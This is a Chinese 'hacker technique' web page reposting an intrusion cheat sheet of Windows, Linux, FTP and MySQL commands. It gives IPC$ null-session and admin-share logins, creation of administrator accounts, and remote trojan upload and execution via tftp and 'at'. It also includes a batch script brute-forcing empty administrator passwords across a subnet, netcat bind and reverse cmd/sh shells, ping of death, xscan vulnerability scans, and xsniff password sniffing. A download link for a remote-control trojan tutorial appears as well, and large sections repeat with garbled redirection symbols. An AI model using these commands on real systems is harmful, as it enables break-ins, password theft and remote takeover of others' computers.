当前位置：网站首页 > 黑客技术 > 正文

wifiillk黑客软件_wifi黑客教程

作者：hacker发布时间：2022-11-28分类：黑客技术浏览：105评论：2

导读：导航：1、计算机命令2、有木有黑客视频教程-魔镜传说远控木马使用教程mjcs.wmv种子下载，谢恩公！3、关于DOS命令?4、cmd中全部命令`````5...

计算机命令

进入注册表该用 regedit

net use \\ip\ipc$ " " /user:" " 建立IPC空链接

net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

net use h: \\ip\c$ 登陆后映射对方C：到本地为H:

net use \\ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名开启服务；(如:net start telnet， net start schedule)

net stop 服务名停止某服务

net time \\目标ip 查看对方时间

net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \\ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C：共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况，常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

del /S /Q 目录或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）

move 盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，" "和" " 是重定向命令

at id号开启已注册的某个计划任务

at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口远和登陆服务器,默认端口为23

open ip 连接到IP（属telnet登陆后的命令）

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件

copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：

xcopy 要复制的文件或目录树目标地址\目录名复制文件和目录树，用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送

tftp -i 对方IP put c:\server.exe 登陆后，上传本地c:\server.exe至主机

ftp ip 端口用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)

route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface

arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的存档，只读，系统，隐藏属性；用＋则是添加为某属性

dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

pause 暂停批处理程序，并显示出：请按任意键继续....

if 在批处理程序中执行条件处理（更多说明见if命令及变量）

goto 标签将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）

call 路径\批处理文件名从批处理程序中调用另一个批处理程序（更多说明见call /?）

for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）

echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置

echo 信息在屏幕上显示出信息

echo 信息 pass.txt 将"信息"保存到pass.txt文件中

findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello

find 文件名查找某文件

title 标题名字更改CMD窗口标题名字

color 颜色值设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

prompt 名称更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )

print 文件名打印文本文件

ver 在DOS窗口下显示版本信息

winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）

format 盘符 /FS:类型格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS

replace 源文件要替换文件的目录替换文件

ren 原文件名新文件名重命名文件名

tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称

type 文件名显示文本文件的内容

more 文件名逐屏显示输出文件

doskey 要锁定的命令＝字符

doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=

taskmgr 调出任务管理器

chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误

tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口

exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe

path 路径\可执行文件的文件名为可执行文件设置一个路径。

cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?

regedit /s 注册表文件名导入注册表；参数/S指安静模式导入，无任何提示；

regedit /e 注册表文件名导出注册表

cacls 文件名参数显示或修改文件访问控制列表（ACL）??针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。

cacls 文件名查看文件的访问用户权限列表

REM 文本内容在批处理文件中添加注解

netsh 查看或更改本地网络配置情况

IIS服务命令：

iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）

iisreset /start或stop 启动（停止）所有Internet服务

iisreset /restart 停止然后重新启动所有Internet服务

iisreset /status 显示所有Internet服务状态

iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动

iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机

iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务

iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。

FTP 命令： (后面有详细说明内容)

ftp的命令行格式为:

ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。

－d 使用调试方式。

－n 限制ftp的自动登录,即不使用.netrc文件。

－g 取消全局文件名。

help [命令] 或？[命令] 查看命令说明

bye 或 quit 终止主机FTP进程,并退出FTP管理方式.

pwd 列出当前远端主机目录

put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中

get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中

mget [remote-files] 从远端主机接收一批文件至本地主机

mput local-files 将本地主机中一批文件传送至远端主机

dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件

ascii 设定以ASCII方式传送文件(缺省值)

bin 或 image 设定以二进制方式传送文件

bell 每完成一次文件传送,报警提示

cdup 返回上一级目录

close 中断与远程服务器的ftp会话(与open对应)

open host[port] 建立指定ftp服务器连接,可指定连接端口

delete 删除远端主机中的文件

mdelete [remote-files] 删除一批文件

mkdir directory-name 在远端主机中建立目录

rename [from] [to] 改变远端主机中的文件名

rmdir directory-name 删除远端主机中的目录

status 显示当前FTP的状态

system 显示远端主机系统类型

user user-name [password] [account] 重新以别的用户名登录远端主机

open host [port] 重新建立一个新的连接

prompt 交互提示模式

macdef 定义宏命令

lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录

chmod 改变远端主机的文件权限

case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母

cd remote－dir 进入远程主机目录

! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip

MYSQL 命令：

mysql -h主机地址 -u用户名－p密码连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。

（例：mysql -h110.110.110.110 -Uroot -P123456

注:u与root可以不用加空格，其它也一样）

exit 退出MYSQL

mysqladmin -u用户名 -p旧密码 password 新密码修改密码

grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）

show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。

use mysql；

show tables; 显示库中的数据表

describe 表名; 显示数据表的结构

create database 库名; 建库

use 库名；

create table 表名 (字段设定列表)；建表

drop database 库名;

drop table 表名；删库和删表

delete from 表名; 将表中记录清空

select * from 表名; 显示表中的记录

mysqldump --opt schoolschool.bbb 备份数据库：（命令在DOS的\\mysql\\bin目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。

win2003系统下新增命令（实用部份）：

shutdown /参数关闭或重启本地或远程主机。

参数说明：/S 关闭主机，/R 重启主机， /T 数字设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。

例：shutdown /r /t 0 立即重启本地主机（无延时）

taskill /参数进程名或进程的pid 终止一个或多个任务和进程。

参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。

tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。

参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程。

Linux系统下基本命令：要区分大小写

uname 显示版本信息（同win2K的 ver）

dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）

pwd 查询当前所在的目录位置

cd cd ..回到上一层目录，注意cd 与..之间有空格。cd /返回到根目录。

cat 文件名查看文件内容

cat abc.txt 往abc.txt文件中写上内容。

more 文件名以一页一页的方式显示一个文本文件。

cp 复制文件

mv 移动文件

rm 文件名删除文件，rm -a 目录名删除目录及子目录

chmod 设定档案或目录的存取权限

grep 在档案中查找字符串

diff 档案文件比较

find 档案搜寻

date 现在的日期、时间

who 查询目前和你使用同一台机器的人以及Login时间地点

w 查询目前上机者的详细资料

whoami 查看自己的帐号名称

groups 查看某人的Group

passwd 更改密码

history 查看自己下过的命令

ps 显示进程状态

kill 停止某进程

gcc 黑客通常用它来编译C语言写的文件

su 权限转换为指定使用者

telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。

ftp ftp连接上某服务器（同win2K）

附：批处理命令与变量

1：for命令及变量基本格式：

FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。

批处理每次能处理的变量从%0?%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2?%9指输入的第2-9个值；例：net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}

command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：来隔开

command_parameters：为特定命令指定参数或命令行开关

IN (set)：指在(set)中取值；DO command ：指执行command

参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。

用法举例：

@echo off

echo 用法格式：test.bat *.*.* test.txt

for /L %%G in (1 1 254) do echo %1.%%G test.txt net use \\%1.%%G /user:administrator | find "命令成功完成" test.txt

存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。

/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。

@echo off

echo 用法格式：ok.bat ip

FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200

存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。

2：if命令及变量基本格式：

IF [not] errorlevel 数字命令语句如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。

例：IF errorlevel 0 命令指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。

0 指发现并成功执行（真）；1 指没有发现、没执行（假）。

IF [not] 字符串1==字符串2 命令语句如果指定的文本字符串匹配（即：字符串1 等于字符串2），就执行后面的命令。

例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）

IF [not] exist 文件名命令语句如果指定的文件名存在，就执行后面的命令。

例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。

IF [not] errorlevel 数字命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名命令语句 else 命令语句加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。当有del命令时需把del命令全部内容用括起来，因为del命令要单独一行时才能执行，用上后就等于是单独一行了；例如：“if exist test.txt. del test.txt. else echo test.txt.missing ”，注意命令中的“.”

（二）系统外部命令(均需下载相关工具)：

1、瑞士军刀：nc.exe

参数说明：

-h 查看帮助信息

-d 后台模式

-e prog程序重定向，一但连接就执行〔危险〕

-i secs延时的间隔

-l 监听模式，用于入站连接

-L 监听模式，连接天闭后仍然继续监听，直到CTR+C

-n IP地址，不能用域名

-o film记录16进制的传输

-p[空格]端口本地端口号

-r 随机本地及远程端口

-t 使用Telnet交互方式

-u UDP模式

-v 详细输出，用-vv将更详细

-w数字 timeout延时间隔

-z 将输入，输出关掉（用于扫锚时）

基本用法：

nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口

nc -l -p 80 开启本机的TCP 80端口并监听

nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口

nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口

nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口

高级用法：

nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止

nc -L -p 80 c:\log.txt 作为蜜罐用2：开启并不停地监听80端口，直到CTR+C,同时把结果输出到c:\log.txt

nc -L -p 80 c:\honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用

type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用

本机上用：nc -l -p 本机端口

在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K

nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙

本机上用：nc -d -l -p 本机端口要传送的文件路径及名称

在对方主机上用：nc -vv 本机IP 本机端口存放文件的路径及名称传送文件到对方主机

备注：

| 管道命令

或重定向命令。“”，例如：tlntadmn test.txt 指把test.txt的内容赋值给tlntadmn命令

＠表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:\winnt d:\log.txt 意思是：后台执行dir，并把结果存在d:\log.txt中

与的区别 ""指：覆盖；""指：保存到(添加到）。

如：@dir c:\winnt d:\log.txt和@dir c:\winnt d:\log.txt二个命令分别执行二次比较看：用的则是把二次的结果都保存了，而用：则只有一次的结果，是因为第二次的结果把第一次的覆盖了。

2、扫锚工具：xscan.exe

基本格式

xscan -host 起始IP[-终止IP] 检测项目 [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息

xscan -file 主机列表文件名检测项目 [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息

检测项目

-active 检测主机是否存活

-os 检测远程操作系统类型（通过NETBIOS和SNMP协议）

-port 检测常用服务的端口状态

-ftp 检测FTP弱口令

-pub 检测FTP服务匿名用户写权限

-pop3 检测POP3-Server弱口令

-smtp 检测SMTP-Server漏洞

-sql 检测SQL-Server弱口令

-smb 检测NT-Server弱口令

-iis 检测IIS编码/解码漏洞

-cgi 检测CGI漏洞

-nasl 加载Nessus攻击脚本

-all 检测以上所有项目

其它选项

-i 适配器编号设置网络适配器, 适配器编号可通过"-l"参数获取

-l 显示所有网络适配器

-v 显示详细扫描进度

-p 跳过没有响应的主机

-o 跳过没有检测到开放端口的主机

-t 并发线程数量,并发主机数量指定最大并发线程数量和并发主机数量, 默认数量为100,10

-log 文件名指定扫描报告文件名 (后缀为：TXT或HTML格式的文件)

用法示例

xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机

xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大并发线程数量为150，跳过没有检测到开放端口的主机

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机

3、命令行方式嗅探器: xsniff.exe

可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

参数说明

-tcp 输出TCP数据报

-udp 输出UDP数据报

-icmp 输出ICMP数据报

-pass 过滤密码信息

-hide 后台运行

-host 解析主机名

-addr IP地址过滤IP地址

-port 端口过滤端口

-log 文件名将输出保存到文件

-asc 以ASCII形式输出

-hex 以16进制形式输出

用法示例

xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中

xsniff.exe -tcp -udp -asc -a

有木有黑客视频教程-魔镜传说远控木马使用教程mjcs.wmv种子下载，谢恩公！

黑客视频教程-魔镜传说远控木马使用教程mjcs.wmv种子下载地址：

thunder://QUFodHRwOi8vYWlrYW5keS5vcmcv6buR5a6i6KeG6aKR5pWZ56iLLemtlOmVnOS8oOivtOi/nOaOp+acqOmprOS9v+eUqOaVmeeoi21qY3Mud212P2ZpZD1iSGhSQ3FESmlodkl0QnVJNVpYMGo0WHUxRGtBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBJm1pZD02NjYmdGhyZXNob2xkPTE1MCZ0aWQ9RTUxREQ3QkMwMUE5MjgyQkE3N0VDMUMzQkVCM0NCRjcmc3JjaWQ9MTIwJnZlcm5vPTFaWg==

记得采纳

关于DOS命令?

先输“cd\”回车

net use \\ip\ipc$ " " /user:" " 建立IPC空链接

net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

net use h: \\ip\c$ 登陆后映射对方C：到本地为H:

net use \\ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名开启服务；(如:net start telnet， net start schedule)

net stop 服务名停止某服务

net time \\目标ip 查看对方时间

net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \\ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C：共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况，常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

move 盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，" "和" " 是重定向命令

at id号开启已注册的某个计划任务

at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口远和登陆服务器,默认端口为23

open ip 连接到IP（属telnet登陆后的命令）

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件

copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：

xcopy 要复制的文件或目录树目标地址\目录名复制文件和目录树，用参数/Y将不提示覆盖相同文件

tftp -i 对方IP put c:\server.exe 登陆后，上传本地c:\server.exe至主机

ftp ip 端口用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)

route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface

arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的存档，只读，系统，隐藏属性；用＋则是添加为某属性

dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

pause 暂停批处理程序，并显示出：请按任意键继续....

if 在批处理程序中执行条件处理（更多说明见if命令及变量）

goto 标签将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）

call 路径\批处理文件名从批处理程序中调用另一个批处理程序（更多说明见call /?）

for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）

echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置

echo 信息在屏幕上显示出信息

echo 信息 pass.txt 将"信息"保存到pass.txt文件中

findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello

find 文件名查找某文件

title 标题名字更改CMD窗口标题名字

prompt 名称更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )

print 文件名打印文本文件

ver 在DOS窗口下显示版本信息

winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）

format 盘符 /FS:类型格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS

replace 源文件要替换文件的目录替换文件

ren 原文件名新文件名重命名文件名

tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称

type 文件名显示文本文件的内容

more 文件名逐屏显示输出文件

doskey 要锁定的命令＝字符

taskmgr 调出任务管理器

chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误

tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口

exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe

path 路径\可执行文件的文件名为可执行文件设置一个路径。

cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?

regedit /s 注册表文件名导入注册表；参数/S指安静模式导入，无任何提示；

regedit /e 注册表文件名导出注册表

cacls 文件名参数显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。

cacls 文件名查看文件的访问用户权限列表

REM 文本内容在批处理文件中添加注解

netsh 查看或更改本地网络配置情况

IIS服务命令：

iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）

iisreset /start或stop 启动（停止）所有Internet服务

iisreset /restart 停止然后重新启动所有Internet服务

iisreset /status 显示所有Internet服务状态

iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动

iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机

iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务

FTP 命令： (后面有详细说明内容)

ftp的命令行格式为:

ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。

－d 使用调试方式。

－n 限制ftp的自动登录,即不使用.netrc文件。

－g 取消全局文件名。

